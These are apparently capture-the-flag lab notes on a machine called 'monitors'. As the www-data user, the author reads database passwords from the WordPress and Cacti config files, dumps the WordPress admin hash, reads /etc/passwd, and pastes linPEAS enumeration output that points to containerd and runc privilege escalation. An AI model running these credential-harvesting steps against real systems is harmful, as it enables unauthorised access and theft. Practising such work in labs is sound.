6 box enum www-data
www-data@monitors:/usr/share/cacti$ mysql -u wpadmin -p
Enter password: BestAdministrator@2020!
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wordpress |
+--------------------+
2 rows in set (0.00 sec)
mysql> select user_login,user_pass, user_email from wp_users;
+------------+------------------------------------+-------------------+
| user_login | user_pass | user_email |
+------------+------------------------------------+-------------------+
| admin | $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 | admin@monitor.htb |
+------------+------------------------------------+-------------------+
# we know admin pass; no need to crack
# checking the folder name, I tried so much,
www-data@monitors:/usr/share/cacti$ cd /var/www
www-data@monitors:/var/www$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Nov 10 2020 .
drwxr-xr-x 15 root root 4096 Nov 10 2020 ..
drwxr-xr-x 5 www-data www-data 4096 Apr 21 20:19 wordpress
www-data@monitors:/var/www/wordpress$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
had issues transferring files, no wget, curl used __curl bash function
PEAS
# processes
root 1343 0.0 1.1 978804 48124 ? Ssl 19:07 0:00 /usr/bin/containerd
root 2113 0.0 0.1 110228 5660 ? Sl 19:07 0:00 _ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/d76094c5f30c08c24b23d78c5895d61ea5262ce4095f76efa04031a2502c3be5 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 2138 0.1 2.0 3410072 83344 ? Ssl 19:07 0:05 _ /usr/local/openjdk-8/bin/java -Dorg.gradle.appname=gradlew -classpath /usr/src/apache-ofbiz-17.12.01/gradle/wrapper/gradle-wrapper.jar org.gradle.wrapper.GradleWrapperMain --offline ofbiz
root 1660 0.0 2.0 1344420 82372 ? Ssl 19:07 0:02 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
╣ Interfaces
br-968a1c1855aa: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
ether 02:42:c5:ff:fb:68 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
inet6 fe80::42:c1ff:fe0b:d224 prefixlen 64 scopeid 0x20<link>
ether 02:42:c1:0b:d2:24 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5 bytes 446 (446.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth67dfbca: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::b401:24ff:fe71:571a prefixlen 64 scopeid 0x20<link>
ether b6:01:24:71:57:1a txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21 bytes 1662 (1.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╣ Active Ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN -
╣ Users with console
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
root:x:0:0:root:/root:/bin/bash
╣ PHP exec extensions
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-enabled/cacti-admin.monitors.htb.conf
/etc/apache2/sites-enabled/monitors.htb.conf
╣ Analyzing Wordpress Files (limit 70)
-rwxr-xr-x 1 www-data www-data 3117 Oct 15 2020 /var/www/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
define( 'DB_HOST', 'localhost' );
-rw-r--r-- 1 998 998 361 Nov 11 2020 /srv/gitlab/data/.gitconfig
╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"
╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/bin/runc, you may be able to escalate privileges with it
-rw-r--r-- 1 root root 5140 Nov 10 2020 /usr/share/cacti/cacti/include/config.php
-rw-r--r-- 1 www-data www-data 5144 May 3 2020 /usr/share/cacti/cacti/include/config.php.dist
$database_type = 'mysql';
$database_default = 'cacti';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port = '3306';
$database_type = 'mysql';
$database_default = 'cacti';
$database_username = 'cacti';
$database_password = 'cactipass';
$database_port = '3306';
Last updated